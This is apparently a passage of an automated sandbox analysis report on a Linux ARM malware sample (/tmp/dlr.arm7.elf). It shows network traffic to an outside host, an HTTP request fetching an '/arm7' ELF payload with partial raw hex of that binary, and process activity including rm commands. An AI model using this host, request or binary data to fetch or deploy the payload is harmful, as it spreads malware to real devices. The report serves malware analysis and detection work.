                                                Dec 30, 2024 03:01:34.564610004 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.564626932 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.564630985 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564630985 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564642906 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564644098 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.564656973 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.564666986 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564681053 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.565382957 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.565395117 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.565407038 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.565418959 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.565421104 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.565429926 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.566196918 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.566210985 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.566222906 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.566361904 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.568728924 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.568759918 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.568958998 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.568972111 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.569256067 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.804804087 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.804821968 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.804832935 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.804845095 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.804860115 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.804863930 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.804874897 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.804887056 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805002928 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805018902 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805033922 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805043936 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805054903 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805066109 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805077076 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805454969 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805480003 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805490971 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805500984 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805511951 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805521965 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805794954 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.805896997 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805907965 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805919886 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.805931091 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.808689117 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.810615063 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.810628891 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.810645103 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.810658932 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.811418056 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.031665087 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.031718016 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.057718992 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.062750101 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062767029 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062778950 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062800884 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062813997 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062825918 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062838078 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062848091 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062859058 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062868118 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062879086 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.062891006 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.063067913 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.063080072 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.063090086 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.064627886 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.279922009 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.279984951 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.580580950 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.585720062 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585745096 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585757971 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585767984 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585777044 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.585779905 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585791111 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585803032 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585815907 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585830927 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585841894 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585854053 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.585865974 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.586049080 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.586064100 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.586076021 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.586086988 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.586098909 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.587398052 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.592293978 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.592307091 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.592319012 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.592329025 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.594242096 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:35.807672977 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:35.807727098 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:36.095338106 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:36.100270987 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:36.100287914 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:36.100297928 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:36.100342989 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:36.101427078 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:37.424520016 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:37.429451942 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:45.125220060 CET4433925634.249.145.219192.168.2.23
                                                Dec 30, 2024 03:01:45.125602007 CET39256443192.168.2.2334.249.145.219
                                                Dec 30, 2024 03:01:45.130454063 CET4433925634.249.145.219192.168.2.23
                                                Dec 30, 2024 03:01:49.182005882 CET4251680192.168.2.23109.202.202.202
                                                Dec 30, 2024 03:01:55.325179100 CET43928443192.168.2.2391.189.91.42
                                                Dec 30, 2024 03:02:36.279714108 CET43928443192.168.2.2391.189.91.42
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.2341112103.149.87.1880
                                                TimestampBytes transferredDirectionData
                                                Dec 30, 2024 03:01:33.425852060 CET34OUTGET /arm7 HTTP/1.0
                                                Dec 30, 2024 03:01:34.324152946 CET1236INHTTP/1.1 200 OK
                                                Server: nginx/1.14.2
                                                Date: Mon, 30 Dec 2024 02:01:34 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 120528
                                                Last-Modified: Sun, 22 Dec 2024 00:20:06 GMT
                                                Connection: close
                                                ETag: "67675b36-1d6d0"
                                                Accept-Ranges: bytes
                                                Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 94 81 00 00 34 00 00 00 78 d4 01 00 02 00 00 04 34 00 20 00 05 00 28 00 0f 00 0e 00 01 00 00 70 30 ce 01 00 30 4e 02 00 30 4e 02 00 18 01 00 00 18 01 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 48 cf 01 00 48 cf 01 00 05 00 00 00 00 80 00 00 01 00 00 00 00 d0 01 00 00 d0 02 00 00 d0 02 00 04 04 00 00 d8 74 00 00 06 00 00 00 00 80 00 00 07 00 00 00 04 d0 01 00 04 d0 02 00 04 d0 02 00 00 00 00 00 08 00 00 00 04 00 00 00 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 04 d4 02 00 00 00 00 00 00 d0 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff [TRUNCATED]
                                                Data Ascii: ELF(4x4 (p00N0NHHtQtd-L@-,@0S 0S/00@/-@0SM88/00S$0S// ---0R9KA-@P00Pp@0'R00?@d`1QW00000G1@P`X-00`F@ 0P0 `\AA/-\M3P0:S\/E-M@P ? ?p3K0Ll6@0`l1@ ?P"@Pp` U0 0l@?P
                                                Dec 30, 2024 03:01:34.324179888 CET1236INData Raw: 0a 04 00 a0 e1 07 10 a0 e1 06 20 a0 e1 01 3a a0 e3 00 60 8d e5 26 32 00 eb 01 00 70 e3 01 00 a0 13 02 00 00 1a 01 50 55 e2 e2 ff ff 2a 00 00 e0 e3 a4 d0 8d e2 f0 45 bd e8 1e ff 2f e1 28 d5 02 00 01 00 53 e1 00 c0 a0 d3 30 40 2d e9 03 e0 a0 e1 02
                                                Data Ascii: :`&2pPU*E/(S0@-@P 0S\Q*0@/@-MMP`p*O?xdP
                                                Dec 30, 2024 03:01:34.324191093 CET1236INData Raw: e5 0d 00 a0 e1 db fe ff eb 00 00 50 e3 47 00 00 1a 88 01 9f e5 61 14 00 eb 04 10 a0 e1 00 30 a0 e1 78 21 9f e5 0d 00 a0 e1 d2 fe ff eb 00 00 50 e3 3e 00 00 1a 68 01 9f e5 58 14 00 eb 04 10 a0 e1 00 30 a0 e1 58 21 9f e5 0d 00 a0 e1 c9 fe ff eb 00
                                                Data Ascii: PGa0x!P>hX0X!P5HO08!P,(F0!P#=0 P40 P+
                                                Dec 30, 2024 03:01:34.324210882 CET1236INData Raw: e5 01 3b 40 e2 00 00 5c e3 03 30 e0 e1 10 30 94 15 10 30 85 e5 08 30 87 e2 03 38 a0 e1 0c 00 85 e5 34 00 8d e2 03 00 90 e8 23 24 a0 e1 ff e0 00 e2 ff c0 01 e2 ff 2c 02 e2 20 04 a0 e1 21 14 a0 e1 3a 60 84 e2 23 2c 82 e1 0e 04 80 e1 0c 14 81 e1 54
                                                Data Ascii: ;@\000084#$, !:`#,T0 0T0T@ TPH00@B0@T 00QS&`:p@tT0!$,8#$
                                                Dec 30, 2024 03:01:34.324222088 CET956INData Raw: e7 18 30 a0 e3 92 03 0e e0 00 30 d4 e5 b0 30 c3 e3 40 30 83 e3 00 30 c4 e5 00 30 d4 e5 0d c7 89 e2 20 50 9d e5 2c 24 a0 e1 0a 30 c3 e3 05 30 83 e3 ff 2c 02 e2 ff 00 05 e2 2c 2c 82 e1 25 14 a0 e1 28 c0 9d e5 00 30 c4 e5 00 14 81 e1 29 78 a0 e1 1c
                                                Data Ascii: 000@000 P,$00,,,%(0)x ("4$\<"@00 /00<00@0 00000 P $0@00
                                                Dec 30, 2024 03:01:34.324232101 CET1236INData Raw: e5 2c 20 9f e5 00 00 53 e3 00 30 92 15 00 60 81 05 00 60 83 15 00 60 82 05 00 60 82 15 04 00 96 e5 09 10 a0 e3 92 2d 00 eb 70 40 bd e8 1e ff 2f e1 20 d4 02 00 24 d4 02 00 04 e0 2d e5 18 30 9f e5 04 d0 4d e2 00 00 93 e5 09 10 a0 e3 88 2d 00 eb 04
                                                Data Ascii: , S0````-p@/ $-0M-/@0@-0PM@xE@@T0@0@/ $p@-DPP4`@P@Tp@
                                                Dec 30, 2024 03:01:34.324243069 CET1236INData Raw: e3 01 2c a0 e3 07 00 a0 e1 c9 39 00 eb 87 0e 8d e2 0c 20 a0 e3 10 12 9f e5 05 00 80 e2 c0 39 00 eb 09 00 a0 e1 07 10 a0 e1 01 2c a0 e3 8e 2c 00 eb 01 00 70 e3 0e 00 00 0a 87 0e 8d e2 ec 11 9f e5 05 00 80 e2 04 00 00 ea 2e 13 00 eb 00 00 50 e3 d8
                                                Data Ascii: ,9 9,,p.P0;0S0S@o.@P-00S,p0480s03S
                                                Dec 30, 2024 03:01:34.324254990 CET1236INData Raw: e5 05 20 a0 e3 5b ff ff eb 1e 00 a0 e3 f0 10 9f e5 05 20 a0 e3 57 ff ff eb 1f 00 a0 e3 e4 10 9f e5 07 20 a0 e3 53 ff ff eb 20 00 a0 e3 d8 10 9f e5 0a 20 a0 e3 4f ff ff eb 21 00 a0 e3 cc 10 9f e5 05 20 a0 e3 4b ff ff eb 22 00 a0 e3 c0 10 9f e5 0b
                                                Data Ascii: [ W S O! K" G# C$ ?% @:(<$0<HT\dlt
                                                Dec 30, 2024 03:01:34.324265003 CET1236INData Raw: e1 00 00 85 e0 6c 0d 00 eb 05 00 a0 e1 7d 0d 00 eb 00 30 9a e5 00 00 85 e0 78 10 93 e5 66 0d 00 eb 05 00 a0 e1 77 0d 00 eb f8 10 9f e5 00 00 85 e0 61 0d 00 eb 05 00 a0 e1 72 0d 00 eb 0b 10 84 e2 00 00 85 e0 5c 0d 00 eb 05 00 a0 e1 07 10 a0 e1 01
                                                Data Ascii: l}0xfwar\* *pg", p@)T),@P[%++ P[
                                                Dec 30, 2024 03:01:34.324276924 CET1236INData Raw: eb 05 00 a0 e1 0a 10 a0 e1 01 2a a0 e3 00 29 00 eb 01 00 70 e3 0a 00 a0 e1 15 00 00 0a 17 0c 00 eb 32 2c 8d e2 00 10 a0 e1 30 20 82 e2 0a 00 a0 e1 31 0f 00 eb 01 00 70 e3 0d 00 00 0a 09 00 a0 e1 2f 43 00 eb 09 10 a0 e3 c1 28 00 eb 04 00 a0 e1 14
                                                Data Ascii: *)p2,0 1p/C(**4G*P**m@PA2D1`F1PE1J*@P)O
                                                Dec 30, 2024 03:01:34.329432964 CET1236INData Raw: e0 a4 0b 00 eb 05 00 a0 e1 ea 0a 00 eb 0b 10 84 e2 00 00 85 e0 9f 0b 00 eb 05 00 a0 e1 07 10 a0 e1 01 2a a0 e3 c8 27 00 eb 01 00 70 e3 06 00 a0 e1 13 00 00 0a c2 0e 00 eb 00 40 a0 e1 55 27 00 eb 00 00 54 e1 07 00 a0 e1 15 00 00 0a d9 0a 00 eb 22
                                                Data Ascii: *'p@U'T", p')@P[() P[(EO/


                                                System Behavior

                                                Start time (UTC):02:01:32
                                                Start date (UTC):30/12/2024
                                                Path:/tmp/dlr.arm7.elf
                                                Arguments:/tmp/dlr.arm7.elf
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Start time (UTC):02:01:44
                                                Start date (UTC):30/12/2024
                                                Path:/usr/bin/dash
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):02:01:44
                                                Start date (UTC):30/12/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /tmp/tmp.xLXIGDm9Dk /tmp/tmp.pKhlYb5CMx /tmp/tmp.8J7qwhKIuO
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):02:01:44
                                                Start date (UTC):30/12/2024
                                                Path:/usr/bin/dash
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):02:01:44
                                                Start date (UTC):30/12/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /tmp/tmp.xLXIGDm9Dk /tmp/tmp.pKhlYb5CMx /tmp/tmp.8J7qwhKIuO
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b